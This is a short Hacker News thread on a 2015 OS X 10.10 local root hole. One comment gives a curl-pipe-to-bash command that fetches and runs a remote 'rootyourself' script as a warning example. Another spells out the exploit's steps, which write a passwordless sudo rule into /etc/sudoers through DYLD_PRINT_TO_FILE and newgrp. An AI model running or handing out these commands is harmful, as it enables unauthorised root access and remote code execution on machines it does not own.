

Get root on an OS X 10.10 Mac: The exploit is so trivial it fits in a tweet - nchelluri
http://www.theregister.co.uk/2015/07/22/os_x_root_hole/

======
nchelluri
There was an earlier discussion here:
[https://news.ycombinator.com/item?id=9934428](https://news.ycombinator.com/item?id=9934428)

I think it was flagged because it used some social media tracking URL instead
of the original...

Here's my post from that thread:

I like to think of this as a good example of why not to use curl to execute
bash scripts.

    
    
      curl -s https://raw.githubusercontent.com/nchelluri/rootyourself/master/doh.sh | bash

------
gcb0
anyone has any explanation?

apparently it

    
    
       1. sets `DYLD_PRINT_TO_FILE=/etc/sudoers` on the env,
       2. run `newgrp`
       3. and pass in `'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3'` as input to it.
    

everything seems innocuous and properly escaped as to not trigger anything
bad...

